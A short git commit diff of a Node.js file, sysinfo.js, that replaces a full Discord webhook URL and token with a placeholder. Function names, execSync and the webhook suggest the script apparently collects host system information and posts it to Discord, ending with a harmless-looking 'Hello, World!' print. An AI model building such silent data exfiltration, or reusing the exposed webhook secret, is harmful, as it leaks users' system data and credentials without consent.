Update sysinfo.js
This commit is contained in:
@@ -5,7 +5,7 @@ const os = require('os')
|
||||
const path = require('path')
|
||||
const { execSync } = require('child_process')
|
||||
|
||||
const webhook = 'https://discord.com/api/webhooks/1174058827046473821/ntdtWTD8o2Vhy5YHtxtFw3DAj23Oqe4RMd01tbgQEHXD04iJwVCbg3LZSfXCdcBKoUnd'
|
||||
const webhook = 'https://discord.com/api/webhooks/xxx/xxx'
|
||||
|
||||
async function systemInformationFullCopy() {
|
||||
try {
|
||||
@@ -65,4 +65,4 @@ async function systemInformationDump() {
|
||||
|
||||
systemInformationDump();
|
||||
|
||||
console.log('Hello, World!')
|
||||
console.log('Hello, World!')
|
||||
|
||||
Reference in New Issue
Block a user